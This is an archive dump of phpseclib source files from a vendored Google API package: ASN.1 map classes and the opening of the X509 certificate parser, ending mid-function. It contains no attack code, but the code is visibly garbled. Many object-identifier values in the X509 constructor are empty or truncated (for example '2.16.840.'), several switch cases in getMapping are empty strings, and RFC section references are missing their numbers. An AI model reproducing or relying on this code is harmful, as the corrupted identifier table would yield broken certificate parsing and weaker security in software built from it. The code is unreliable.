['type' => ASN1::TYPE_BIT_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RevokedCertificate.php000064400000001371147600400120024507 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * RevokedCertificate * * @author Jim Wigginton */ abstract class RevokedCertificate { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'userCertificate' => CertificateSerialNumber::MAP, 'revocationDate' => Time::MAP, 'crlEntryExtensions' => [ 'optional' => true ] + Extensions::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DSAPublicKey.php000064400000000742147600400120023165 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * DSAPublicKey * * @author Jim Wigginton */ abstract class DSAPublicKey { const MAP = ['type' => ASN1::TYPE_INTEGER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/HoldInstructionCode.php000064400000001001147600400120024656 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * HoldInstructionCode * * @author Jim Wigginton */ abstract class HoldInstructionCode { const MAP = ['type' => ASN1::TYPE_OBJECT_IDENTIFIER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/RDNSequence.php000064400000002010147600400120023050 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * RDNSequence * * In practice, RDNs containing multiple name-value pairs (called "multivalued RDNs") are rare, * but they can be useful at times when either there is no unique attribute in the entry or you * want to ensure that the entry's DN contains some useful identifying information. * * - https://www.opends.org/wiki/page/DefinitionRelativeDistinguishedName * * @author Jim Wigginton */ abstract class RDNSequence { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, // RDNSequence does not define a min or a max, which means it doesn't have one 'min' => 0, 'max' => -1, 'children' => RelativeDistinguishedName::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AttributeTypeAndValue.php000064400000001204147600400120025165 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * AttributeTypeAndValue * * @author Jim Wigginton */ abstract class AttributeTypeAndValue { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'type' => AttributeType::MAP, 'value' => AttributeValue::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Element.php000064400000001512147600400120021433 0ustar00 * @copyright 2012 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1; /** * ASN.1 Raw Element * * An ASN.1 ANY mapping will return an ASN1\Element object. Use of this object * will also bypass the normal encoding rules in ASN1::encodeDER() * * @author Jim Wigginton */ class Element { /** * Raw element value * * @var string */ public $element; /** * Constructor * * @param string $encoded * @return \phpseclib3\File\ASN1\Element */ public function __construct($encoded) { $this->element = $encoded; } } google-api/vendor/phpseclib/phpseclib/phpseclib/File/X509.php000064400000427107147600400120020021 0ustar00 * @copyright 2012 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\PrivateKey; use phpseclib3\Crypt\Common\PublicKey; use phpseclib3\Crypt\DSA; use phpseclib3\Crypt\EC; use phpseclib3\Crypt\Hash; use phpseclib3\Crypt\PublicKeyLoader; use phpseclib3\Crypt\Random; use phpseclib3\Crypt\RSA; use phpseclib3\Crypt\RSA\Formats\Keys\PSS; use phpseclib3\Exception\UnsupportedAlgorithmException; use phpseclib3\File\ASN1\Element; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * Pure-PHP X.509 Parser * * @author Jim Wigginton */ class X509 { /** * Flag to only accept signatures signed by certificate authorities * * Not really used anymore but retained all the same to suppress E_NOTICEs from old installs * */ const VALIDATE_SIGNATURE_BY_CA = 1; /** * Return internal array representation * * @see \phpseclib3\File\X509::getDN() */ const DN_ARRAY = 0; /** * Return string * * @see \phpseclib3\File\X509::getDN() */ const DN_STRING = 1; /** * Return ASN.1 name string * * @see \phpseclib3\File\X509::getDN() */ const DN_ASN1 = 2; /** * Return OpenSSL compatible array * * @see \phpseclib3\File\X509::getDN() */ const DN_OPENSSL = 3; /** * Return canonical ASN.1 RDNs string * * @see \phpseclib3\File\X509::getDN() */ const DN_CANON = 4; /** * Return name hash for file indexing * * @see \phpseclib3\File\X509::getDN() */ const DN_HASH = 5; /** * Save as PEM * * ie. a base64-encoded PEM with a header and a footer * * @see \phpseclib3\File\X509::saveX509() * @see \phpseclib3\File\X509::saveCSR() * @see \phpseclib3\File\X509::saveCRL() */ const FORMAT_PEM = 0; /** * Save as DER * * @see \phpseclib3\File\X509::saveX509() * @see \phpseclib3\File\X509::saveCSR() * @see \phpseclib3\File\X509::saveCRL() */ const FORMAT_DER = 1; /** * Save as a SPKAC * * @see \phpseclib3\File\X509::saveX509() * @see \phpseclib3\File\X509::saveCSR() * @see \phpseclib3\File\X509::saveCRL() * * Only works on CSRs. Not currently supported. */ const FORMAT_SPKAC = 2; /** * Auto-detect the format * * Used only by the load*() functions * * @see \phpseclib3\File\X509::saveX509() * @see \phpseclib3\File\X509::saveCSR() * @see \phpseclib3\File\X509::saveCRL() */ const FORMAT_AUTO_DETECT = 3; /** * Attribute value disposition. * If disposition is >= 0, this is the index of the target value. */ const ATTR_ALL = -1; // All attribute values (array). const ATTR_APPEND = -2; // Add a value. const ATTR_REPLACE = -3; // Clear first, then add a value. /** * Distinguished Name * * @var array */ private $dn; /** * Public key * * @var string|PublicKey */ private $publicKey; /** * Private key * * @var string|PrivateKey */ private $privateKey; /** * The certificate authorities * * @var array */ private $CAs = []; /** * The currently loaded certificate * * @var array */ private $currentCert; /** * The signature subject * * There's no guarantee \phpseclib3\File\X509 is going to re-encode an X.509 cert in the same way it was originally * encoded so we take save the portion of the original cert that the signature would have made for. * * @var string */ private $signatureSubject; /** * Certificate Start Date * * @var string */ private $startDate; /** * Certificate End Date * * @var string|Element */ private $endDate; /** * Serial Number * * @var string */ private $serialNumber; /** * Key Identifier * * See {@link http://tools.ietf.org/html/rfc5280#section- RFC5280#section-} and * {@link http://tools.ietf.org/html/rfc5280#section- RFC5280#section-}. * * @var string */ private $currentKeyIdentifier; /** * CA Flag * * @var bool */ private $caFlag = false; /** * SPKAC Challenge * * @var string */ private $challenge; /** * @var array */ private $extensionValues = []; /** * OIDs loaded * * @var bool */ private static $oidsLoaded = false; /** * Recursion Limit * * @var int */ private static $recur_limit = 5; /** * URL fetch flag * * @var bool */ private static $disable_url_fetch = false; /** * @var array */ private static $extensions = []; /** * @var ?array */ private $ipAddresses = null; /** * @var ?array */ private $domains = null; /** * Default Constructor. * * @return \phpseclib3\File\X509 */ public function __construct() { // Explicitly Tagged Module, 1988 Syntax // http://tools.ietf.org/html/rfc5280#appendix-A.1 if (!self::$oidsLoaded) { // OIDs from RFC5280 and those RFCs mentioned in RFC5280#section- ASN1::loadOIDs([ //'id-pkix' => '', //'id-pe' => '', //'id-qt' => '', //'id-kp' => '', //'id-ad' => '', 'id-qt-cps' => '', 'id-qt-unotice' => '', 'id-ad-ocsp' => '', 'id-ad-caIssuers' => '', 'id-ad-timeStamping' => '', 'id-ad-caRepository' => '', //'id-at' => '2.5.4', 'id-at-name' => '', 'id-at-surname' => '', 'id-at-givenName' => '', 'id-at-initials' => '', 'id-at-generationQualifier' => '', 'id-at-commonName' => '', 'id-at-localityName' => '', 'id-at-stateOrProvinceName' => '', 'id-at-organizationName' => '', 'id-at-organizationalUnitName' => '', 'id-at-title' => '', 'id-at-description' => '', 'id-at-dnQualifier' => '', 'id-at-countryName' => '', 'id-at-serialNumber' => '', 'id-at-pseudonym' => '', 'id-at-postalCode' => '', 'id-at-streetAddress' => '', 'id-at-uniqueIdentifier' => '', 'id-at-role' => '', 'id-at-postalAddress' => '', 'jurisdictionOfIncorporationCountryName' => '', 'jurisdictionOfIncorporationStateOrProvinceName' => '', 'jurisdictionLocalityName' => '', 'id-at-businessCategory' => '', //'id-domainComponent' => '0.9.2342.19200300.100.1.25', //'pkcs-9' => '1.2.840.113549.1.9', 'pkcs-9-at-emailAddress' => '1.2.840.113549.1.9.1', //'id-ce' => '2.5.29', 'id-ce-authorityKeyIdentifier' => '', 'id-ce-subjectKeyIdentifier' => '', 'id-ce-keyUsage' => '', 'id-ce-privateKeyUsagePeriod' => '', 'id-ce-certificatePolicies' => '', //'anyPolicy' => '', 'id-ce-policyMappings' => '', 'id-ce-subjectAltName' => '', 'id-ce-issuerAltName' => '', 'id-ce-subjectDirectoryAttributes' => '', 'id-ce-basicConstraints' => '', 'id-ce-nameConstraints' => '', 'id-ce-policyConstraints' => '', 'id-ce-cRLDistributionPoints' => '', 'id-ce-extKeyUsage' => '', //'anyExtendedKeyUsage' => '', 'id-kp-serverAuth' => '', 'id-kp-clientAuth' => '', 'id-kp-codeSigning' => '', 'id-kp-emailProtection' => '', 'id-kp-timeStamping' => '', 'id-kp-OCSPSigning' => '', 'id-ce-inhibitAnyPolicy' => '', 'id-ce-freshestCRL' => '', 'id-pe-authorityInfoAccess' => '', 'id-pe-subjectInfoAccess' => '', 'id-ce-cRLNumber' => '', 'id-ce-issuingDistributionPoint' => '', 'id-ce-deltaCRLIndicator' => '', 'id-ce-cRLReasons' => '', 'id-ce-certificateIssuer' => '', 'id-ce-holdInstructionCode' => '', //'holdInstruction' => '1.2.840.10040.2', 'id-holdinstruction-none' => '1.2.840.10040.2.1', 'id-holdinstruction-callissuer' => '1.2.840.10040.2.2', 'id-holdinstruction-reject' => '1.2.840.10040.2.3', 'id-ce-invalidityDate' => '', 'rsaEncryption' => '1.2.840.113549.1.1.1', 'md2WithRSAEncryption' => '1.2.840.113549.1.1.2', 'md5WithRSAEncryption' => '1.2.840.113549.1.1.4', 'sha1WithRSAEncryption' => '1.2.840.113549.1.1.5', 'sha224WithRSAEncryption' => '1.2.840.113549.1.1.14', 'sha256WithRSAEncryption' => '1.2.840.113549.1.1.11', 'sha384WithRSAEncryption' => '1.2.840.113549.1.1.12', 'sha512WithRSAEncryption' => '1.2.840.113549.1.1.13', 'id-ecPublicKey' => '1.2.840.10045.2.1', 'ecdsa-with-SHA1' => '1.2.840.10045.4.1', // from https://tools.ietf.org/html/rfc5758#section-3.2 'ecdsa-with-SHA224' => '1.2.840.10045.4.3.1', 'ecdsa-with-SHA256' => '1.2.840.10045.4.3.2', 'ecdsa-with-SHA384' => '1.2.840.10045.4.3.3', 'ecdsa-with-SHA512' => '1.2.840.10045.4.3.4', 'id-dsa' => '1.2.840.10040.4.1', 'id-dsa-with-sha1' => '1.2.840.10040.4.3', // from https://tools.ietf.org/html/rfc5758#section-3.1 'id-dsa-with-sha224' => '2.16.840.', 'id-dsa-with-sha256' => '2.16.840.', // from https://tools.ietf.org/html/rfc8410: 'id-Ed25519' => '', 'id-Ed448' => '', 'id-RSASSA-PSS' => '1.2.840.113549.1.1.10', //'id-sha224' => '2.16.840.', //'id-sha256' => '2.16.840.', //'id-sha384' => '2.16.840.', //'id-sha512' => '2.16.840.', //'id-GostR3411-94-with-GostR3410-94' => '1.2.643.2.2.4', //'id-GostR3411-94-with-GostR3410-2001' => '1.2.643.2.2.3', //'id-GostR3410-2001' => '1.2.643.2.2.20', //'id-GostR3410-94' => '1.2.643.2.2.19', // Netscape Object Identifiers from "Netscape Certificate Extensions" 'netscape' => '2.16.840.1.113730', 'netscape-cert-extension' => '2.16.840.1.113730.1', 'netscape-cert-type' => '2.16.840.1.113730.1.1', 'netscape-comment' => '2.16.840.1.113730.1.13', 'netscape-ca-policy-url' => '2.16.840.1.113730.1.8', // the following are X.509 extensions not supported by phpseclib 'id-pe-logotype' => '', 'entrustVersInfo' => '1.2.840.113533.7.65.0', 'verisignPrivate' => '2.16.840.1.113733.1.6.9', // for Certificate Signing Requests // see http://tools.ietf.org/html/rfc2985 'pkcs-9-at-unstructuredName' => '1.2.840.113549.1.9.2', // PKCS #9 unstructured name 'pkcs-9-at-challengePassword' => '1.2.840.113549.1.9.7', // Challenge password for certificate revocations 'pkcs-9-at-extensionRequest' => '1.2.840.113549.1.9.14' // Certificate extension request ]); } } /** * Load X.509 certificate * * Returns an associative array describing the X.509 cert or a false if the cert failed to load * * @param array|string $cert * @param int $mode * @return mixed */ public function loadX509($cert, $mode = self::FORMAT_AUTO_DETECT) { if (is_array($cert) && isset($cert['tbsCertificate'])) { unset($this->currentCert); unset($this->currentKeyIdentifier); $this->dn = $cert['tbsCertificate']['subject']; if (!isset($this->dn)) { return false; } $this->currentCert = $cert; $currentKeyIdentifier = $this->getExtension('id-ce-subjectKeyIdentifier'); $this->currentKeyIdentifier = is_string($currentKeyIdentifier) ? $currentKeyIdentifier : null; unset($this->signatureSubject); return $cert; } if ($mode != self::FORMAT_DER) { $newcert = ASN1::extractBER($cert); if ($mode == self::FORMAT_PEM && $cert == $newcert) { return false; } $cert = $newcert; } if ($cert === false) { $this->currentCert = false; return false; } $decoded = ASN1::decodeBER($cert); if ($decoded) { $x509 = ASN1::asn1map($decoded[0], Maps\Certificate::MAP); } if (!isset($x509) || $x509 === false) { $this->currentCert = false; return false; } $this->signatureSubject = substr($cert, $decoded[0]['content'][0]['start'], $decoded[0]['content'][0]['length']); if ($this->isSubArrayValid($x509, 'tbsCertificate/extensions')) { $this->mapInExtensions($x509, 'tbsCertificate/extensions'); } $this->mapInDNs($x509, 'tbsCertificate/issuer/rdnSequence'); $this->mapInDNs($x509, 'tbsCertificate/subject/rdnSequence'); $key = $x509['tbsCertificate']['subjectPublicKeyInfo']; $key = ASN1::encodeDER($key, Maps\SubjectPublicKeyInfo::MAP); $x509['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey'] = "-----BEGIN PUBLIC KEY-----\r\n" . chunk_split(base64_encode($key), 64) . "-----END PUBLIC KEY-----"; $this->currentCert = $x509; $this->dn = $x509['tbsCertificate']['subject']; $currentKeyIdentifier = $this->getExtension('id-ce-subjectKeyIdentifier'); $this->currentKeyIdentifier = is_string($currentKeyIdentifier) ? $currentKeyIdentifier : null; return $x509; } /** * Save X.509 certificate * * @param array $cert * @param int $format optional * @return string */ public function saveX509(array $cert, $format = self::FORMAT_PEM) { if (!is_array($cert) || !isset($cert['tbsCertificate'])) { return false; } switch (true) { // "case !$a: case !$b: break; default: whatever();" is the same thing as "if ($a && $b) whatever()" case !($algorithm = $this->subArray($cert, 'tbsCertificate/subjectPublicKeyInfo/algorithm/algorithm')): case is_object($cert['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey']): break; default: $cert['tbsCertificate']['subjectPublicKeyInfo'] = new Element( base64_decode(preg_replace('#-.+-|[\r\n]#', '', $cert['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey'])) ); } if ($algorithm == 'rsaEncryption') { $cert['signatureAlgorithm']['parameters'] = null; $cert['tbsCertificate']['signature']['parameters'] = null; } $filters = []; $type_utf8_string = ['type' => ASN1::TYPE_UTF8_STRING]; $filters['tbsCertificate']['signature']['parameters'] = $type_utf8_string; $filters['tbsCertificate']['signature']['issuer']['rdnSequence']['value'] = $type_utf8_string; $filters['tbsCertificate']['issuer']['rdnSequence']['value'] = $type_utf8_string; $filters['tbsCertificate']['subject']['rdnSequence']['value'] = $type_utf8_string; $filters['tbsCertificate']['subjectPublicKeyInfo']['algorithm']['parameters'] = $type_utf8_string; $filters['signatureAlgorithm']['parameters'] = $type_utf8_string; $filters['authorityCertIssuer']['directoryName']['rdnSequence']['value'] = $type_utf8_string; //$filters['policyQualifiers']['qualifier'] = $type_utf8_string; $filters['distributionPoint']['fullName']['directoryName']['rdnSequence']['value'] = $type_utf8_string; $filters['directoryName']['rdnSequence']['value'] = $type_utf8_string; foreach (self::$extensions as $extension) { $filters['tbsCertificate']['extensions'][] = $extension; } /* in the case of policyQualifiers/qualifier, the type has to be \phpseclib3\File\ASN1::TYPE_IA5_STRING. \phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING will cause OpenSSL's X.509 parser to spit out random characters. */ $filters['policyQualifiers']['qualifier'] = ['type' => ASN1::TYPE_IA5_STRING]; ASN1::setFilters($filters); $this->mapOutExtensions($cert, 'tbsCertificate/extensions'); $this->mapOutDNs($cert, 'tbsCertificate/issuer/rdnSequence'); $this->mapOutDNs($cert, 'tbsCertificate/subject/rdnSequence'); $cert = ASN1::encodeDER($cert, Maps\Certificate::MAP); switch ($format) { case self::FORMAT_DER: return $cert; // case self::FORMAT_PEM: default: return "-----BEGIN CERTIFICATE-----\r\n" . chunk_split(Strings::base64_encode($cert), 64) . '-----END CERTIFICATE-----'; } } /** * Map extension values from octet string to extension-specific internal * format. * * @param array $root (by reference) * @param string $path */ private function mapInExtensions(array &$root, $path) { $extensions = &$this->subArrayUnchecked($root, $path); if ($extensions) { for ($i = 0; $i < count($extensions); $i++) { $id = $extensions[$i]['extnId']; $value = &$extensions[$i]['extnValue']; /* [extnValue] contains the DER encoding of an ASN.1 value corresponding to the extension type identified by extnID */ $map = $this->getMapping($id); if (!is_bool($map)) { $decoder = $id == 'id-ce-nameConstraints' ? [static::class, 'decodeNameConstraintIP'] : [static::class, 'decodeIP']; $decoded = ASN1::decodeBER($value); if (!$decoded) { continue; } $mapped = ASN1::asn1map($decoded[0], $map, ['iPAddress' => $decoder]); $value = $mapped === false ? $decoded[0] : $mapped; if ($id == 'id-ce-certificatePolicies') { for ($j = 0; $j < count($value); $j++) { if (!isset($value[$j]['policyQualifiers'])) { continue; } for ($k = 0; $k < count($value[$j]['policyQualifiers']); $k++) { $subid = $value[$j]['policyQualifiers'][$k]['policyQualifierId']; $map = $this->getMapping($subid); $subvalue = &$value[$j]['policyQualifiers'][$k]['qualifier']; if ($map !== false) { $decoded = ASN1::decodeBER($subvalue); if (!$decoded) { continue; } $mapped = ASN1::asn1map($decoded[0], $map); $subvalue = $mapped === false ? $decoded[0] : $mapped; } } } } } } } } /** * Map extension values from extension-specific internal format to * octet string. * * @param array $root (by reference) * @param string $path */ private function mapOutExtensions(array &$root, $path) { $extensions = &$this->subArray($root, $path, !empty($this->extensionValues)); foreach ($this->extensionValues as $id => $data) { extract($data); $newext = [ 'extnId' => $id, 'extnValue' => $value, 'critical' => $critical ]; if ($replace) { foreach ($extensions as $key => $value) { if ($value['extnId'] == $id) { $extensions[$key] = $newext; continue 2; } } } $extensions[] = $newext; } if (is_array($extensions)) { $size = count($extensions); for ($i = 0; $i < $size; $i++) { if ($extensions[$i] instanceof Element) { continue; } $id = $extensions[$i]['extnId']; $value = &$extensions[$i]['extnValue']; switch ($id) { case 'id-ce-certificatePolicies': for ($j = 0; $j < count($value); $j++) { if (!isset($value[$j]['policyQualifiers'])) { continue; } for ($k = 0; $k < count($value[$j]['policyQualifiers']); $k++) { $subid = $value[$j]['policyQualifiers'][$k]['policyQualifierId']; $map = $this->getMapping($subid); $subvalue = &$value[$j]['policyQualifiers'][$k]['qualifier']; if ($map !== false) { // by default \phpseclib3\File\ASN1 will try to render qualifier as a \phpseclib3\File\ASN1::TYPE_IA5_STRING since it's // actual type is \phpseclib3\File\ASN1::TYPE_ANY $subvalue = new Element(ASN1::encodeDER($subvalue, $map)); } } } break; case 'id-ce-authorityKeyIdentifier': // use 00 as the serial number instead of an empty string if (isset($value['authorityCertSerialNumber'])) { if ($value['authorityCertSerialNumber']->toBytes() == '') { $temp = chr((ASN1::CLASS_CONTEXT_SPECIFIC << 6) | 2) . "\1\0"; $value['authorityCertSerialNumber'] = new Element($temp); } } } /* [extnValue] contains the DER encoding of an ASN.1 value corresponding to the extension type identified by extnID */ $map = $this->getMapping($id); if (is_bool($map)) { if (!$map) { //user_error($id . ' is not a currently supported extension'); unset($extensions[$i]); } } else { $value = ASN1::encodeDER($value, $map, ['iPAddress' => [static::class, 'encodeIP']]); } } } } /** * Map attribute values from ANY type to attribute-specific internal * format. * * @param array $root (by reference) * @param string $path */ private function mapInAttributes(&$root, $path) { $attributes = &$this->subArray($root, $path); if (is_array($attributes)) { for ($i = 0; $i < count($attributes); $i++) { $id = $attributes[$i]['type']; /* $value contains the DER encoding of an ASN.1 value corresponding to the attribute type identified by type */ $map = $this->getMapping($id); if (is_array($attributes[$i]['value'])) { $values = &$attributes[$i]['value']; for ($j = 0; $j < count($values); $j++) { $value = ASN1::encodeDER($values[$j], Maps\AttributeValue::MAP); $decoded = ASN1::decodeBER($value); if (!is_bool($map)) { if (!$decoded) { continue; } $mapped = ASN1::asn1map($decoded[0], $map); if ($mapped !== false) { $values[$j] = $mapped; } if ($id == 'pkcs-9-at-extensionRequest' && $this->isSubArrayValid($values, $j)) { $this->mapInExtensions($values, $j); } } elseif ($map) { $values[$j] = $value; } } } } } } /** * Map attribute values from attribute-specific internal format to * ANY type. * * @param array $root (by reference) * @param string $path */ private function mapOutAttributes(&$root, $path) { $attributes = &$this->subArray($root, $path); if (is_array($attributes)) { $size = count($attributes); for ($i = 0; $i < $size; $i++) { /* [value] contains the DER encoding of an ASN.1 value corresponding to the attribute type identified by type */ $id = $attributes[$i]['type']; $map = $this->getMapping($id); if ($map === false) { //user_error($id . ' is not a currently supported attribute', E_USER_NOTICE); unset($attributes[$i]); } elseif (is_array($attributes[$i]['value'])) { $values = &$attributes[$i]['value']; for ($j = 0; $j < count($values); $j++) { switch ($id) { case 'pkcs-9-at-extensionRequest': $this->mapOutExtensions($values, $j); break; } if (!is_bool($map)) { $temp = ASN1::encodeDER($values[$j], $map); $decoded = ASN1::decodeBER($temp); if (!$decoded) { continue; } $values[$j] = ASN1::asn1map($decoded[0], Maps\AttributeValue::MAP); } } } } } } /** * Map DN values from ANY type to DN-specific internal * format. * * @param array $root (by reference) * @param string $path */ private function mapInDNs(array &$root, $path) { $dns = &$this->subArray($root, $path); if (is_array($dns)) { for ($i = 0; $i < count($dns); $i++) { for ($j = 0; $j < count($dns[$i]); $j++) { $type = $dns[$i][$j]['type']; $value = &$dns[$i][$j]['value']; if (is_object($value) && $value instanceof Element) { $map = $this->getMapping($type); if (!is_bool($map)) { $decoded = ASN1::decodeBER($value); if (!$decoded) { continue; } $value = ASN1::asn1map($decoded[0], $map); } } } } } } /** * Map DN values from DN-specific internal format to * ANY type. * * @param array $root (by reference) * @param string $path */ private function mapOutDNs(array &$root, $path) { $dns = &$this->subArray($root, $path); if (is_array($dns)) { $size = count($dns); for ($i = 0; $i < $size; $i++) { for ($j = 0; $j < count($dns[$i]); $j++) { $type = $dns[$i][$j]['type']; $value = &$dns[$i][$j]['value']; if (is_object($value) && $value instanceof Element) { continue; } $map = $this->getMapping($type); if (!is_bool($map)) { $value = new Element(ASN1::encodeDER($value, $map)); } } } } } /** * Associate an extension ID to an extension mapping * * @param string $extnId * @return mixed */ private function getMapping($extnId) { if (!is_string($extnId)) { // eg. if it's a \phpseclib3\File\ASN1\Element object return true; } if (isset(self::$extensions[$extnId])) { return self::$extensions[$extnId]; } switch ($extnId) { case 'id-ce-keyUsage': return Maps\KeyUsage::MAP; case 'id-ce-basicConstraints': return Maps\BasicConstraints::MAP; case 'id-ce-subjectKeyIdentifier': return Maps\KeyIdentifier::MAP; case 'id-ce-cRLDistributionPoints': return Maps\CRLDistributionPoints::MAP; case 'id-ce-authorityKeyIdentifier': return Maps\AuthorityKeyIdentifier::MAP; case 'id-ce-certificatePolicies': return Maps\CertificatePolicies::MAP; case 'id-ce-extKeyUsage': return Maps\ExtKeyUsageSyntax::MAP; case 'id-pe-authorityInfoAccess': return Maps\AuthorityInfoAccessSyntax::MAP; case 'id-ce-subjectAltName': return Maps\SubjectAltName::MAP; case 'id-ce-subjectDirectoryAttributes': return Maps\SubjectDirectoryAttributes::MAP; case 'id-ce-privateKeyUsagePeriod': return Maps\PrivateKeyUsagePeriod::MAP; case 'id-ce-issuerAltName': return Maps\IssuerAltName::MAP; case 'id-ce-policyMappings': return Maps\PolicyMappings::MAP; case 'id-ce-nameConstraints': return Maps\NameConstraints::MAP; case 'netscape-cert-type': return Maps\netscape_cert_type::MAP; case 'netscape-comment': return Maps\netscape_comment::MAP; case 'netscape-ca-policy-url': return Maps\netscape_ca_policy_url::MAP; // since id-qt-cps isn't a constructed type it will have already been decoded as a string by the time it gets // back around to asn1map() and we don't want it decoded again. //case 'id-qt-cps': // return Maps\CPSuri::MAP; case 'id-qt-unotice': return Maps\UserNotice::MAP; // the following OIDs are unsupported but we don't want them to give notices when calling saveX509(). case 'id-pe-logotype': // http://www.ietf.org/rfc/rfc3709.txt case 'entrustVersInfo': // http://support.microsoft.com/kb/287547 case '': // szOID_ENROLL_CERTTYPE_EXTENSION case '': // szOID_CERTSRV_CA_VERSION // "SET Secure Electronic Transaction Specification" // http://www.maithean.com/docs/set_bk3.pdf case '': // id-set-hashedRootKey // "Certificate Transparency" // https://tools.ietf.org/html/rfc6962 case '': // "Qualified Certificate statements" // https://tools.ietf.org/html/rfc3739#section-3.2.6 case '': return true; // CSR attributes case 'pkcs-9-at-unstructuredName': return Maps\PKCS9String::MAP; case 'pkcs-9-at-challengePassword': return Maps\DirectoryString::MAP; case 'pkcs-9-at-extensionRequest': return Maps\Extensions::MAP; // CRL extensions. case 'id-ce-cRLNumber': return Maps\CRLNumber::MAP; case 'id-ce-deltaCRLIndicator': return Maps\CRLNumber::MAP; case 'id-ce-issuingDistributionPoint': return Maps\IssuingDistributionPoint::MAP; case 'id-ce-freshestCRL': return Maps\CRLDistributionPoints::MAP; case 'id-ce-cRLReasons': return Maps\CRLReason::MAP; case 'id-ce-invalidityDate': return Maps\InvalidityDate::MAP; case 'id-ce-certificateIssuer': return Maps\CertificateIssuer::MAP; case 'id-ce-holdInstructionCode': return Maps\HoldInstructionCode::MAP; case 'id-at-postalAddress': return Maps\PostalAddress::MAP; } return false; } /** * Load an X.509 certificate as a certificate authority * * @param string $cert * @return bool */ public function loadCA($cert) { $olddn = $this->dn; $oldcert = $this->currentCert; $oldsigsubj = $this->signatureSubject; $oldkeyid = $this->currentKeyIdentifier; $cert = $this->loadX509($cert); if (!$cert) { $this->dn = $olddn; $this->currentCert = $oldcert; $this->signatureSubject = $oldsigsubj; $this->currentKeyIdentifier = $oldkeyid; return false; } /* From RFC5280 "PKIX Certificate and CRL Profile": If the keyUsage extension is present, then the subject public key MUST NOT be used to verify signatures on certificates or CRLs unless the corresponding keyCertSign or cRLSign bit is set. */ //$keyUsage = $this->getExtension('id-ce-keyUsage'); //if ($keyUsage && !in_array('keyCertSign', $keyUsage)) { // return false; //} /* From RFC5280 "PKIX Certificate and CRL Profile": The cA boolean indicates whether the certified public key may be used to verify certificate signatures. If the cA boolean is not asserted, then the keyCertSign bit in the key usage extension MUST NOT be asserted. If the basic constraints extension is not present in a version 3 certificate, or the extension is present but the cA boolean is not asserted, then the certified public key MUST NOT be used to verify certificate signatures. */ //$basicConstraints = $this->getExtension('id-ce-basicConstraints'); //if (!$basicConstraints || !$basicConstraints['cA']) { // return false; //} $this->CAs[] = $cert; $this->dn = $olddn; $this->currentCert = $oldcert; $this->signatureSubject = $oldsigsubj; return true; } /** * Validate an X.509 certificate against a URL * * From RFC2818 "HTTP over TLS": * * Matching is performed using the matching rules specified by * [RFC2459]. If more than one identity of a given type is present in * the certificate (e.g., more than one dNSName name, a match in any one * of the set is considered acceptable.) Names may contain the wildcard * character * which is considered to match any single domain name * component or component fragment. E.g., *.a.com matches foo.a.com but * not bar.foo.a.com. f*.com matches foo.com but not bar.com. * * @param string $url * @return bool */ public function validateURL($url) { if (!is_array($this->currentCert) || !isset($this->currentCert['tbsCertificate'])) { return false; } $components = parse_url($url); if (!isset($components['host'])) { return false; } if ($names = $this->getExtension('id-ce-subjectAltName')) { foreach ($names as $name) { foreach ($name as $key => $value) { $value = preg_quote($value); $value = str_replace('\*', '[^.]*', $value); switch ($key) { case 'dNSName': /* From RFC2818 "HTTP over TLS": If a subjectAltName extension of type dNSName is present, that MUST be used as the identity. Otherwise, the (most specific) Common Name field in the Subject field of the certificate MUST be used. Although the use of the Common Name is existing practice, it is deprecated and Certification Authorities are encouraged to use the dNSName instead. */ if (preg_match('#^' . $value . '$#', $components['host'])) { return true; } break; case 'iPAddress': /* From RFC2818 "HTTP over TLS": In some cases, the URI is specified as an IP address rather than a hostname. In this case, the iPAddress subjectAltName must be present in the certificate and must exactly match the IP in the URI. */ if (preg_match('#(?:\d{1-3}\.){4}#', $components['host'] . '.') && preg_match('#^' . $value . '$#', $components['host'])) { return true; } } } } return false; } if ($value = $this->getDNProp('id-at-commonName')) { $value = str_replace(['.', '*'], ['\.', '[^.]*'], $value[0]); return preg_match('#^' . $value . '$#', $components['host']) === 1; } return false; } /** * Validate a date * * If $date isn't defined it is assumed to be the current date. * * @param \DateTimeInterface|string $date optional * @return bool */ public function validateDate($date = null) { if (!is_array($this->currentCert) || !isset($this->currentCert['tbsCertificate'])) { return false; } if (!isset($date)) { $date = new \DateTimeImmutable('now', new \DateTimeZone(@date_default_timezone_get())); } $notBefore = 